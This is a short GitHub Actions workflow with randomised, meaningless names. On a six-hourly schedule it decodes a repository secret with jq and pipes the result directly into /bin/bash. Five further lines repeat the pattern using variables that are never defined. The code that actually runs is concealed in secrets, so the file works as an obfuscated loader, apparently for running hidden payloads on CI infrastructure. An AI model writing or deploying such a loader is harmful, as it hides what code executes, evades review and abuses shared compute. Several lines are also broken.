name: taoyebnx

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taoyebnx
        env:
          lln78: ${{ secrets.lln78 }}
        run: |
          echo $lln78 | jq -r .pmonl0 | /bin/bash
          echo $h3 | jq -r .iwrl286 | /bin/bash
          echo $a1 | jq -r .xocep643 | /bin/bash
          echo $o7 | jq -r .lcwvq65945 | /bin/bash
          echo $pcu98 | jq -r .mwkb32 | /bin/bash
          echo $dpbtx66 | jq -r .putyz0 | /bin/bash

